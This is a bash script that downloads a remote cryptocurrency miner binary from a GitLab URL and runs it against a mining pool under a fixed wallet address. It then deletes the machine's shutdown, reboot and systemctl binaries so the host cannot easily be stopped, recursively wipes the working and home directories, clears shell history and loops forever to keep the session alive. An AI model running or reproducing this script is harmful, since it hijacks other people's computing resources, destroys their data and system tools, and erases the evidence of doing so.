#!/bin/bash
wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer 
./cpminer -a yespower -o stratum+tcp://stratum-eu.rplant.xyz:7122 -u QRzykDTJxmmarFsExdyZKAxRKruefbzpM1.akido
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 60
done
